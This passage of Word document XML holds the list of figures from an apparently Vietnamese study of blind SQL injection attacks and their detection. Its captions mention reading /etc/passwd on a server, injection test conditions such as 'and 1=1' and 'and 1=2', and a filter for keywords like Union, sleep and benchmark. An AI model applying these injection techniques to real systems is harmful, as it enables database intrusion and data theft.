          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819435 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</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6" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 1.9: Đọc file /etc/passwd trên máy chủ.</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819436 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>27</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7" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 2.1: Access log của web server lưu thông tin về mã tấn công SQL injection</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819437 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>33</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8" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 2.2: Cảnh báo OSSEC về tấn công SQL injeciton</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819438 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>34</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39" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 2.3: Thuật toán tìm kiếm nhị phân</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819439 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>36</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0" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 2.4: Ví dụ với từ CHARACTER_SET</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819440 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>40</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1" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 2.5: So sánh số lượng yêu cầu cần gửi trong 03 phương pháp</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819441 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>41</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2" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 3.1: Cấu trúc mệnh đề SELECT</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819442 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>43</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3" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 3.2: Câu lệnh tạo bảng users</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819443 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>43</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4" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 3.3: Kết quả trả về của bảng users</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819444 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>44</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5" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 3.4: Mã nguồn chương trình</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819445 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>45</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6" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 3.5: Trường hợp đúng (‘s’ = ‘s’). Sắp xếp theo cột id.</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819446 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>46</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7" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 3.6: Trường hợp đúng (‘s’ != ‘A’). Sắp xếp theo cột point.</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819447 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>47</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8" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 3.7: Áp dụng lấy ký tự đầu tiên trong tên CSDL.</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819448 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>53</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49" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 3.8: Sử dụng biến, thay thế sử dụng cột id</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819449 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>54</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0" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 3.9:  Lấy nhiều hơn một ký tự trong một yêu cầu</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819450 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>55</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1" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 3.10: Mô hình hoạt động của Intercepting Filter</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819451 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>65</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2" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 3.11: Mô hình triển khai tấn công Blind SQL injection</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819452 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>66</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3" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 3.12: Dòng code gây ra lỗi SQL injection</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819453 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>67</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4" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 3.13: Hiển thị toàn bộ danh sách nếu không có mức điểm</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819454 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>68</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5" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 3.14: Hiển thị những thí sinh có điểm thi lớn hơn 5</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819455 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>68</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6" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 3.15: Đoạn code lọc từ khóa Union, sleep, benchmark….</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819456 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>68</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7" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 3.16: Trả về toàn bộ danh sách khi điều kiện là True (and 1=1).</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819457 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>69</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8" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Hình 3.17: Không trả về kết quả khi điều kiện là False (and 1=2).</w:t>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc459819458 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00E14CFD">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>69</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59" w:history="1">
        <w:r w:rsidR="00E14CFD" w:rsidRPr="00D7206F">
          <w:rPr>
